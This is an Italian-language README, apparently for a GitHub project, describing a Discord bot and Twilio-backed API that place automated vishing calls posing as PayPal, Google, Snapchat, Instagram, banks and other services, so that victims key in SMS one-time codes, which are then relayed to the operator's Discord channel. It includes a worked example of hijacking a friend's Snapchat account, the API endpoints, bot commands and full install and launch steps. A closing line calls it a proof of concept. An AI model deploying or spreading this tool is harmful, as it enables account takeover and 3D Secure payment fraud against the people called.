
Automatizza le chiamate vishing tramite bot Discord e API per intercettare le password monouso via SMS, aggirando la verifica SMS per PayPal, Google, Instagram e 3D Secure.
Bypassa le verifiche SMS di Paypal, Instagram, Snapchat, Google, 3D Secure e molti altri... usando un Discord Bot o l'API privata.
È davvero semplice. Immagina che il tuo amico abbia un account Snapchat, provi a reimpostare la sua password usando il sistema SMS :
Poi usi il bot (!call 33612345678 snapchat). Il bot lo chiamerà, usando il servizio Snapchat, e gli chiederà il codice ricevuto. Se invia il codice usando il tastierino numerico, riceverai il codice e potrai reimpostare la password. È come un sistema automatico per il SE.
Le richieste API disponibili e funzionanti :
/call con POST DATA :
to: theClientPhoneNumberuser: theUserservice: theUsedServicename: theNameOfTheUserpassword: yourApiPassword/get con POST DATA :
callSid: theCallSidpassword: yourApiPassword/stream/service con GET DATA :
service: theServiceNameYouWannaUse/voice/password con POST DATA :
password: yourApiPasswordcallSid: theCallSidDigits: theDigitsEnteredByTheUSer (non richiesto)Tutti i comandi Admin :
!user add @user : consente a qualcuno di usare il bot e le chiamate!user delete @user : rimuove qualcuno o un admin dal bot!user info @user : ottiene informazioni su un utente!user setadmin @user : imposta un utente come adminTutti i comandi Utenti :
!secret yoursecretpassword @user : imposta un utente come admin senza essere admin!call phonenumber service o per esempio !call 33612345678 paypal : chiama il numero di telefono usando il bot e ottieni il codice SMSI diversi servizi di chiamata supportati :
PaypalGoogleSnapchatInstagramFacebookWhatsappTwitterAmazonCdiscountDefault : work for all the systemsBanque : bypass 3D Secure!call 3312345678 paypal, il Discord Bot invia una richiesta POST alla nostra API privata, che salverà la chiamata nel nostro DB sqlite e invierà la chiamata alla nostra API Twilio./status per sapere cosa fare nella chiamata, la rotta di stato restituisce codice TwiML a Twilio./status restituisce la canzone del servizio self-hosted usando /stream/service route./status invia il codice al tuo canale Discord usando un webhook.Scarica i file dell'API da github
git clone https://github.com/Ross1337/SMSBotBypass.git
Vai nella nostra cartella API
cd /SMSBotBypass/api/
Installa le dipendenze
npm i
Avvia l'API, attendi 15s e poi fermala
npm start
Modifica il file config.js
Apri la porta 1337
Per verificare che tutto funzioni correttamente, ho creato un sistema di test completo. Se il tuo account Twilio non è aggiornato, prima del test vai al file /test/call.js e modifica il numero di telefono alla riga 122 con il tuo numero di telefono.
npm test

La tua API privata ora funziona !
Attenzione, devi anche cambiare la lingua TTS: vai su https://www.twilio.com/console/voice/twiml/text-to-speech e cambia la lingua TTS dall'inglese al francese con la voce Lea.
Prendi la tua password API dal file config.js nella tua cartella api, la useremo
cd ../bots/discord
Modifica il file config.js
Crea due ruoli Discord: uno "Admin" con permessi da Amministratore, e l'altro "Bot User" con qualsiasi permesso.
Aggiungi il bot al server Discord
Inizializza il bot Discord
npm i
Ora puoi avviare il bot Discord
node bot.js
Puoi ottenere tutte le informazioni necessarie su Discord facendo !help

Questo codice è solo un codice POC, non usarlo illegalmente. Potresti essere arrestato per aver usato male questo codice. Usalo solo con i tuoi numeri di telefono o con persone che accettano di testare questo codice.
Sentiti libero di contribuire a questo progetto facendo fork e pull request di questa repo!